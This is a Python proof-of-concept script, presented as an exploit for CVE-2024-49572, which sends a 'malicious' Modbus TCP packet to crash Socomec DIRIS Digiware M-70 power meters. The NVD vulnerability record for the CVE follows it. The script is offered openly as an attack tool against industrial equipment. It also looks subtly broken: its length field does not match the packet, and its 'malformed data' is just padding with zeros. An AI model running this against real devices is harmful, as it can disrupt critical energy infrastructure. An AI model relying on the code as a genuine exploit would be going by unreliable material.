CVE-2024-49572

import socket import struct def cve_2024_49572_poc(target_ip, target_port=502): """ CVE-2024-49572 PoC - Modbus TCP DoS for Socomec DIRIS Digiware M-70 This PoC sends a specially crafted Modbus TCP packet to trigger the vulnerability. """ # Modbus TCP Header (MBAP) transaction_id = struct.pack('>H', 0x0001) protocol_id = struct.pack('>H', 0x0000) length = struct.pack('>H', 0x0006) unit_id = struct.pack('B', 0xFF) # Modbus Function Code - Read Holding Registers function_code = struct.pack('B', 0x03) starting_address = struct.pack('>H', 0x0000) quantity = struct.pack('>H', 0x0001) # Craft malformed packet to trigger vulnerability malformed_data = b'\x00' * 100 # Malformed data packet = transaction_id + protocol_id + length + unit_id + function_code + starting_address + quantity + malformed_data try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(packet) print(f"[*] Malicious packet sent to {target_ip}:{target_port}") sock.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with target IP cve_2024_49572_poc(target)

{"cve": {"id": "CVE-2024-49572", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:50.340", "lastModified": "2025-12-05T21:10:36.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service and weaken credentials resulting in default documented credentials being applied to the device. An attacker can send an unauthenticated packet to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2118", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2024-49572---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-12-08_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2118", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}